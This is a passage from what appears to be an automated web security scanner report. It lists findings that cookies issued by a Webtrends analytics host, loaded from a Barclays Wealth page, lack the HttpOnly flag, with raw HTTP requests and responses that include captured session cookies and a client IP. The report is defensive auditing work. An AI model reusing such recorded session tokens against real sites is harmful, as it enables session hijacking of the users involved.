/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b5024aa3b75cd09538917af6b539c67155cac21e5eaadebfa5c165966f3e8d64be9cc11e428ada21d52b941f155f2c7fd5ae51c72d1b6b3fc444ba911dd0eb36d00226bba2f1f07043b7d373af140c3d72e4ce9144f477f144dbbe2aa0a5502146af4c2da51ea9c097ecf8bdcc40c98492ffab552a828d98a0001e5ea4bebef45674d8250549d27fbe246b0270842ff9234ba8453226ac048925d62ae9ed1fc1bc215ad8c6bc117d7d7756872fb4785da9d30c46a0f86a17e684c65d73f9f46d4fc455f86a500cdc524c11f6833f2ee822f7e6d440f801681da9b1aa65d0ef464b4d43b582fa26e6d0e961744e2800c7c16ac21ab374598da85e052c149dbfeca05a8a805b308205e225f7a9766c3f667b8ba4180f674fa34a5dd9b97d9b10b9560d06ad9ab0e98038df8e4ae7e3b529ec7800e48729be3c7d0fc6f47c26b34cfbdca595b0840800073de1a35a49378b0d2607595a130bbb2a50d84d5ca23a2c907ee0b1423a5c8467254ea2dcfe255575072f2306a5986c6ac5a930e190d0cebbbbb4cb781b92e7e8616e64828704e7f7e5973892be0b10d915ad171058d25c9c252bc80805dce5ae07bee1b7fdfa4e16eb16199ee5c035d0b72f0535a40285bc02469b5ca589600aa302ac307f41f4c127f25807c2171abcda262a66997fdbd8648e706525d12b903d85f86bb00bfb0301ab023897426a18e2030341b5efbcbdc17f00e29490995e7e645e8c071c45763bff07d4cbd08c55b970aa2d69a2cdf4fbfa782a03e52f35203c604c02aa3d9fcef7967a72f1ffce2ea1d5f833c7824d52dbfac17e6d7c68a56a0291505b6dcce38f9c3bf8201c2cd44c61012f9eda3262e104529eefb332c9d5d53a2224c7cf8174f37fc9c077c78741c63ed45f76392a107872e324ab126432f4bedad5544cdac00973163999da663410d559c34d37d16c8825a24c79255bb9f5a9c3d3add2b39f9e11cdf9b08d4c20101b4a58f69693c139eac5cdb238495e8c369a1cf1c7a4211cd721814f21f6a798bfaceeacb01dce7b881fe4b34f9df974d2fa95bd1155b2cf138d981c4ce5f48a9f05e54ae283da7169509a69c7c0532e3ed3581b3d9f55aa3be902628708d95f59ddeb0b605aa711fc0e0c26d3c6a36749acd52b687c2858f2dd38372d724b42ba7699a42b300cd6ff37e859dc8977f5383a32900a155101c10def4af4e74f56bd89a6245fcc853d10ee0c09c2027d0f5af97bd51b7ce9b0b278631a5cadc8aa32b4fbc749ea6d0e2965d93432cc0ab1d68d7bc5c72fd11ede18cbbe0c07f4e0313b666e7c50092ede0601d16080ecf6c303cee3d9a3bc0f723c65d31c8e52458d23f7b439bb80af0e822edfe3ab3de1b40d5c39329eba1ba206e4ed966cc78f309399465fcc747f0d7b19e83bf55f153f6dc5fbb120019a0c2 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=46EC8A693A8B058A0B9D418F6DDAF0B4; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d01953baa; _wt.mode-79569=fcdcc722e93201eda062; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200599559

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=4B58DD7DB5603E2D9048FE4EA69A8782; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; Expires=Sun, 01-Jan-2012 00:02:13 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=024cc5f8; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e9320537bb59; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.51. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b542aaa3d70cb1e0dc106a2655b9c690414e024f1e6a5ebef05104b3affb2d300d3ba13ab148586063b9465c74acbf1fc5afc572d8ef7eaa30424a919dd15a02b564226867a487a382664224fb809c7c52d40b1580f15254504f8a5ff471b010808f8ce9544a19a096fcddf929f12805060f4fb49a530dd811d17f4e248f1e60729408e1156de32fdf347a43d1503f98735b79011746cdd4998406eb2d28aeb14f0309cb412e120f1fe554a59b3179284872fd87a41dcf777320427c4618149e6dd2e3cffd464b9e247b922373da9eb8e6f747d4c08ff569ed5e862855153c564f292731a68e363047da6602d8ef36b0a1fd177ed1013dd9b98c161dc49d7ebd71ca1f848e155462d482710f714a6967ad6fd00d2b733a95bfd99cdcba4b20d9c7eb4358ff95f8e0199b9a2ec2d2d508dacc249533fc4bd8392b12f48863b678bc28259593f538b6377dc0329c8d02db4f25a43f7a350efb2f64bc3c0d14d9e8941e60f502ae5ce5c7556ea2d96ee5f520271e5606a0c8495a0539d06194009eebce941bc8db37370cb14e0182c7045207e59769023f0af16fb66943d5fde3690d800f18fc85ccb4cb77ae91e7b83aeea35b07a8ca9306b1b4b7cf71506577c4b8931578c8c4ace42ea6b3acb1ba01a1b127c2fd87c7a71e199ea67bf2ddaa2ee9602fc1b443006fb1a8909dfac44e7bf2419b8248e7e3ee08b4763356a1cb8c39d6aad4f4e080e84e6c232e3da7885036be3f37a49be5bc50c925bf1c0803db92a81d8ebd57958e85a54801d8440cc9ab8b47b71ab3b4beae1ee1e0b836a7822832da4af42efd8c08456aa231a1ee4dfc738fdcbe5825a97da13c5141daae6ac2c2743582bafe0284aa71b10fc740d22be405463fad7012d30764967e212af6893ab5493642723dd320f211eabf21141d8b11bfa5e75d5c9ed75494c528537d97b42cb8c0025cb9549bb825e872c76d2787ab9f054c5f74d96d8590cb1f3c76b353116c4bf579c7783c1ba996ba09f1822530fdf1e5c53be163324ccfbdb8c8943cbb0f1c6ea0567a38996463ff640871e522cf06a8bd0949d4f07bf9a1e46b06977a35ddb5ca9ca720a72e8f86382e28ef500f7ba93257f248ec2a39ddcb0b103fc761ec7e4c2383e3e3327999a53b1d4c787d82281d328d774bc28f5699a12e4019e69f577869d9a94295dd6a3700cf404471c468cf0af1974f33ed9c8334ffbcf58d75de5c29d707e86f0fec7e75be0cec35d708a37a7cbd18da5204fb9269ead80e0c452c3447f92a91b6f88ef0823f446e3e1dde6b1c22a150443b360b1cf099febe2341f150551973e6767eb68963ec7a37597033d90b2780c8d3c26439eef5af6e82db9f838ba89111585c38860a5bf001dc8c3  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b542aaa3d70cb1e0dc106a2655b9c690414e024f1e6a5ebef05104b3affb2d300d3ba13ab148586063b9465c74acbf1fc5afc572d8ef7eaa30424a919dd15a02b564226867a487a382664224fb809c7c52d40b1580f15254504f8a5ff471b010808f8ce9544a19a096fcddf929f12805060f4fb49a530dd811d17f4e248f1e60729408e1156de32fdf347a43d1503f98735b79011746cdd4998406eb2d28aeb14f0309cb412e120f1fe554a59b3179284872fd87a41dcf777320427c4618149e6dd2e3cffd464b9e247b922373da9eb8e6f747d4c08ff569ed5e862855153c564f292731a68e363047da6602d8ef36b0a1fd177ed1013dd9b98c161dc49d7ebd71ca1f848e155462d482710f714a6967ad6fd00d2b733a95bfd99cdcba4b20d9c7eb4358ff95f8e0199b9a2ec2d2d508dacc249533fc4bd8392b12f48863b678bc28259593f538b6377dc0329c8d02db4f25a43f7a350efb2f64bc3c0d14d9e8941e60f502ae5ce5c7556ea2d96ee5f520271e5606a0c8495a0539d06194009eebce941bc8db37370cb14e0182c7045207e59769023f0af16fb66943d5fde3690d800f18fc85ccb4cb77ae91e7b83aeea35b07a8ca9306b1b4b7cf71506577c4b8931578c8c4ace42ea6b3acb1ba01a1b127c2fd87c7a71e199ea67bf2ddaa2ee9602fc1b443006fb1a8909dfac44e7bf2419b8248e7e3ee08b4763356a1cb8c39d6aad4f4e080e84e6c232e3da7885036be3f37a49be5bc50c925bf1c0803db92a81d8ebd57958e85a54801d8440cc9ab8b47b71ab3b4beae1ee1e0b836a7822832da4af42efd8c08456aa231a1ee4dfc738fdcbe5825a97da13c5141daae6ac2c2743582bafe0284aa71b10fc740d22be405463fad7012d30764967e212af6893ab5493642723dd320f211eabf21141d8b11bfa5e75d5c9ed75494c528537d97b42cb8c0025cb9549bb825e872c76d2787ab9f054c5f74d96d8590cb1f3c76b353116c4bf579c7783c1ba996ba09f1822530fdf1e5c53be163324ccfbdb8c8943cbb0f1c6ea0567a38996463ff640871e522cf06a8bd0949d4f07bf9a1e46b06977a35ddb5ca9ca720a72e8f86382e28ef500f7ba93257f248ec2a39ddcb0b103fc761ec7e4c2383e3e3327999a53b1d4c787d82281d328d774bc28f5699a12e4019e69f577869d9a94295dd6a3700cf404471c468cf0af1974f33ed9c8334ffbcf58d75de5c29d707e86f0fec7e75be0cec35d708a37a7cbd18da5204fb9269ead80e0c452c3447f92a91b6f88ef0823f446e3e1dde6b1c22a150443b360b1cf099febe2341f150551973e6767eb68963ec7a37597033d90b2780c8d3c26439eef5af6e82db9f838ba89111585c38860a5bf001dc8c3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fc2253380d08e93542b96517e511b542aaa3d70cb1e0dc106a2655b9c690414e024f1e6a5ebef05104b3affb2d300d3ba13ab148586063b9465c74acbf1fc5afc572d8ef7eaa30424a919dd15a02b564226867a487a382664224fb809c7c52d40b1580f15254504f8a5ff471b010808f8ce9544a19a096fcddf929f12805060f4fb49a530dd811d17f4e248f1e60729408e1156de32fdf347a43d1503f98735b79011746cdd4998406eb2d28aeb14f0309cb412e120f1fe554a59b3179284872fd87a41dcf777320427c4618149e6dd2e3cffd464b9e247b922373da9eb8e6f747d4c08ff569ed5e862855153c564f292731a68e363047da6602d8ef36b0a1fd177ed1013dd9b98c161dc49d7ebd71ca1f848e155462d482710f714a6967ad6fd00d2b733a95bfd99cdcba4b20d9c7eb4358ff95f8e0199b9a2ec2d2d508dacc249533fc4bd8392b12f48863b678bc28259593f538b6377dc0329c8d02db4f25a43f7a350efb2f64bc3c0d14d9e8941e60f502ae5ce5c7556ea2d96ee5f520271e5606a0c8495a0539d06194009eebce941bc8db37370cb14e0182c7045207e59769023f0af16fb66943d5fde3690d800f18fc85ccb4cb77ae91e7b83aeea35b07a8ca9306b1b4b7cf71506577c4b8931578c8c4ace42ea6b3acb1ba01a1b127c2fd87c7a71e199ea67bf2ddaa2ee9602fc1b443006fb1a8909dfac44e7bf2419b8248e7e3ee08b4763356a1cb8c39d6aad4f4e080e84e6c232e3da7885036be3f37a49be5bc50c925bf1c0803db92a81d8ebd57958e85a54801d8440cc9ab8b47b71ab3b4beae1ee1e0b836a7822832da4af42efd8c08456aa231a1ee4dfc738fdcbe5825a97da13c5141daae6ac2c2743582bafe0284aa71b10fc740d22be405463fad7012d30764967e212af6893ab5493642723dd320f211eabf21141d8b11bfa5e75d5c9ed75494c528537d97b42cb8c0025cb9549bb825e872c76d2787ab9f054c5f74d96d8590cb1f3c76b353116c4bf579c7783c1ba996ba09f1822530fdf1e5c53be163324ccfbdb8c8943cbb0f1c6ea0567a38996463ff640871e522cf06a8bd0949d4f07bf9a1e46b06977a35ddb5ca9ca720a72e8f86382e28ef500f7ba93257f248ec2a39ddcb0b103fc761ec7e4c2383e3e3327999a53b1d4c787d82281d328d774bc28f5699a12e4019e69f577869d9a94295dd6a3700cf404471c468cf0af1974f33ed9c8334ffbcf58d75de5c29d707e86f0fec7e75be0cec35d708a37a7cbd18da5204fb9269ead80e0c452c3447f92a91b6f88ef0823f446e3e1dde6b1c22a150443b360b1cf099febe2341f150551973e6767eb68963ec7a37597033d90b2780c8d3c26439eef5af6e82db9f838ba89111585c38860a5bf001dc8c3 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=59A67E9E4A42771D4AE9AAE699FFE647; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d016e163d; _wt.mode-79569=fcdcc722e9320333bd69; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:29:52 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=9EE5E42568221972B90415F936FA1D9A; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; Expires=Sun, 01-Jan-2012 00:29:52 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=03c4ccee; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93200db2e76; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.52. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fca292890d6cd87536c914b721f181414af3343fe0e138920aa65419774524be075b2b5f1b2ab1843066aece8f71bddba05ab23869f2955d227d572dab9ed5efa167bc2bca8e25175f55d8517e1334f21288737072c7d27637d16f854c0dd280fa75c5005264714eabeb75412061049f5d29109a198147ec69f9b9f16cd432dbab74fa42fd1960054baf005cfc3345776ae2b78b506d2cf4ee9305215f3c36ab8d804343c9f17c24d6eec92d5a4068d44f3d6279640d681363e30e10dcb959a7fae6a40cb8c5c464066a6609612e1ca6d7cbebb13dacd2ed9055d5fa282c9392f2b0059e61cc683da74b2574cfa23bac627512bab396e0ec31846f4870c6b1fbb2aa9415784daeb8b66c15ffadddd07aeb250f9460b6b057407ef01cffd2193a454c3b83fa845fc98ded6bef457c93bc17ecaa9069b0e82f4e8a17e214d9cc28208446593ebc1ceef705486376b84c3971b165140960058f31a24ebdd78dda40e1df4d33cb0a0e25895c8df49c4854bbb5c1435a5a6373611b67fd5ed4455456dfe5e061dc59eef4191141e0d0cebbbbb4cb781b92e7e8616fb483130032b2512378536e0c258ba2bc76a069b759c8c4ea58f9b5ac759a529801d7ba7eda93afe0ddabb50284d0f2dd2330e40235b893f0fdbdc19c91fed6c3b901ef11a4e147b7d807d2f22b5c5ed60ec2985a5eec30af349443453a8158905daaa4ab3ef284cba238d2b33eddc4838376817bec49561a8484b5e5486b69e61b6d77380006cb4f07b4abc0e97049d0da6d59f2b8d1abaf88ef36907fd525691579327f18efee02836a77f4df2e3be17598d3b2e778029bba743ee8ccd845ea6294f06e2decf38abc4ebd95b95c510c7161faabbad762f454429e9f43927ce5a51f3771c7da9144261adc801782c234a62e741a2649cf5409d6a5228dd012b0f5fb3ea5a14d8b11bfa76748fc9f8331643549233dc7357c4975f7e97c004bd9e5dcc60318d2b38ade449d6cd0bc0da163ca2e2c4297f6152d0aa548b27d987e3d839ab944c7f560e8e4b0e52bf46302a88e7cdea9f0e86a7b4c0a01e32ab8b90482efe55db125a2ff53fdd80c39a4807bd9d1e13e56e2da4058f0ffb9d7d0d21e8f86286b288f55fa6e898222c74dd91f19e8bb4e607fd2a4bc0e3c538383c327191ca03e7849185da7384812fda77ed78a439991ce205c96df42fd8c9cc937c5383f7250ca2061e1f47daf3fa197aa139df9f6e4efa9e59d75be2c49820728fa1f9c7ef5bb6cc9e0e218461a09d818da52d4bb27dcbf682b79452c84d2c97a61e3989ef5a27a040eceed8b1e79127130111b637e59e539ee9b1314215045bc86f7123a277006a15b4  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fca292890d6cd87536c914b721f181414af3343fe0e138920aa65419774524be075b2b5f1b2ab1843066aece8f71bddba05ab23869f2955d227d572dab9ed5efa167bc2bca8e25175f55d8517e1334f21288737072c7d27637d16f854c0dd280fa75c5005264714eabeb75412061049f5d29109a198147ec69f9b9f16cd432dbab74fa42fd1960054baf005cfc3345776ae2b78b506d2cf4ee9305215f3c36ab8d804343c9f17c24d6eec92d5a4068d44f3d6279640d681363e30e10dcb959a7fae6a40cb8c5c464066a6609612e1ca6d7cbebb13dacd2ed9055d5fa282c9392f2b0059e61cc683da74b2574cfa23bac627512bab396e0ec31846f4870c6b1fbb2aa9415784daeb8b66c15ffadddd07aeb250f9460b6b057407ef01cffd2193a454c3b83fa845fc98ded6bef457c93bc17ecaa9069b0e82f4e8a17e214d9cc28208446593ebc1ceef705486376b84c3971b165140960058f31a24ebdd78dda40e1df4d33cb0a0e25895c8df49c4854bbb5c1435a5a6373611b67fd5ed4455456dfe5e061dc59eef4191141e0d0cebbbbb4cb781b92e7e8616fb483130032b2512378536e0c258ba2bc76a069b759c8c4ea58f9b5ac759a529801d7ba7eda93afe0ddabb50284d0f2dd2330e40235b893f0fdbdc19c91fed6c3b901ef11a4e147b7d807d2f22b5c5ed60ec2985a5eec30af349443453a8158905daaa4ab3ef284cba238d2b33eddc4838376817bec49561a8484b5e5486b69e61b6d77380006cb4f07b4abc0e97049d0da6d59f2b8d1abaf88ef36907fd525691579327f18efee02836a77f4df2e3be17598d3b2e778029bba743ee8ccd845ea6294f06e2decf38abc4ebd95b95c510c7161faabbad762f454429e9f43927ce5a51f3771c7da9144261adc801782c234a62e741a2649cf5409d6a5228dd012b0f5fb3ea5a14d8b11bfa76748fc9f8331643549233dc7357c4975f7e97c004bd9e5dcc60318d2b38ade449d6cd0bc0da163ca2e2c4297f6152d0aa548b27d987e3d839ab944c7f560e8e4b0e52bf46302a88e7cdea9f0e86a7b4c0a01e32ab8b90482efe55db125a2ff53fdd80c39a4807bd9d1e13e56e2da4058f0ffb9d7d0d21e8f86286b288f55fa6e898222c74dd91f19e8bb4e607fd2a4bc0e3c538383c327191ca03e7849185da7384812fda77ed78a439991ce205c96df42fd8c9cc937c5383f7250ca2061e1f47daf3fa197aa139df9f6e4efa9e59d75be2c49820728fa1f9c7ef5bb6cc9e0e218461a09d818da52d4bb27dcbf682b79452c84d2c97a61e3989ef5a27a040eceed8b1e79127130111b637e59e539ee9b1314215045bc86f7123a277006a15b4

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fca292890d6cd87536c914b721f181414af3343fe0e138920aa65419774524be075b2b5f1b2ab1843066aece8f71bddba05ab23869f2955d227d572dab9ed5efa167bc2bca8e25175f55d8517e1334f21288737072c7d27637d16f854c0dd280fa75c5005264714eabeb75412061049f5d29109a198147ec69f9b9f16cd432dbab74fa42fd1960054baf005cfc3345776ae2b78b506d2cf4ee9305215f3c36ab8d804343c9f17c24d6eec92d5a4068d44f3d6279640d681363e30e10dcb959a7fae6a40cb8c5c464066a6609612e1ca6d7cbebb13dacd2ed9055d5fa282c9392f2b0059e61cc683da74b2574cfa23bac627512bab396e0ec31846f4870c6b1fbb2aa9415784daeb8b66c15ffadddd07aeb250f9460b6b057407ef01cffd2193a454c3b83fa845fc98ded6bef457c93bc17ecaa9069b0e82f4e8a17e214d9cc28208446593ebc1ceef705486376b84c3971b165140960058f31a24ebdd78dda40e1df4d33cb0a0e25895c8df49c4854bbb5c1435a5a6373611b67fd5ed4455456dfe5e061dc59eef4191141e0d0cebbbbb4cb781b92e7e8616fb483130032b2512378536e0c258ba2bc76a069b759c8c4ea58f9b5ac759a529801d7ba7eda93afe0ddabb50284d0f2dd2330e40235b893f0fdbdc19c91fed6c3b901ef11a4e147b7d807d2f22b5c5ed60ec2985a5eec30af349443453a8158905daaa4ab3ef284cba238d2b33eddc4838376817bec49561a8484b5e5486b69e61b6d77380006cb4f07b4abc0e97049d0da6d59f2b8d1abaf88ef36907fd525691579327f18efee02836a77f4df2e3be17598d3b2e778029bba743ee8ccd845ea6294f06e2decf38abc4ebd95b95c510c7161faabbad762f454429e9f43927ce5a51f3771c7da9144261adc801782c234a62e741a2649cf5409d6a5228dd012b0f5fb3ea5a14d8b11bfa76748fc9f8331643549233dc7357c4975f7e97c004bd9e5dcc60318d2b38ade449d6cd0bc0da163ca2e2c4297f6152d0aa548b27d987e3d839ab944c7f560e8e4b0e52bf46302a88e7cdea9f0e86a7b4c0a01e32ab8b90482efe55db125a2ff53fdd80c39a4807bd9d1e13e56e2da4058f0ffb9d7d0d21e8f86286b288f55fa6e898222c74dd91f19e8bb4e607fd2a4bc0e3c538383c327191ca03e7849185da7384812fda77ed78a439991ce205c96df42fd8c9cc937c5383f7250ca2061e1f47daf3fa197aa139df9f6e4efa9e59d75be2c49820728fa1f9c7ef5bb6cc9e0e218461a09d818da52d4bb27dcbf682b79452c84d2c97a61e3989ef5a27a040eceed8b1e79127130111b637e59e539ee9b1314215045bc86f7123a277006a15b4 HTTP/1.1
Host: ots.optimize.webtrends.com
